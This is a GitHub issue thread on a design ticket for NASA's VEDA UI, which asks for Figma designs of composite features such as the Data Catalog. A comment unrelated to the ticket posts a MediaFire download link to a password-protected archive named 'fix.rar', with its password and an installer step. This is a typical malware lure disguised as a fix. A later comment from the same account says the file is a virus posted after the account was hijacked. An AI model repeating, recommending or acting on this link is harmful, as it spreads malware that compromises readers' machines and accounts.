### ISSUE TITLE
[Design] Template Instance Design - Composite Features

### ISSUE THREAD

**Issue by aboydnw** [NASA-IMPACT/veda-ui#1124]
### Context

In the USWDS context, an example full-page layout would be needed to evaluate structural things like site navigation, use of grids, responsiveness, etc.

This is part of a series of tickets to provide guidance to our internal team and, eventually, instance owners. This ticket focuses on composite features like the E&A or data catalog.

### Acceptance Criteria

- [ ] Composite Features are defined in Figma and agreed upon with engineers

Foundational design elements include:
- Exploration and Analysis
- Data Catalog
- Story Catalog

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MinecraftEarthVillage** [comment]
不要下载我前段时间发的文件，那不是我发的，是另一个人控制我，如果你使用了这个病毒文件，你也会被控制，并且疯狂转发这个病毒
Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.
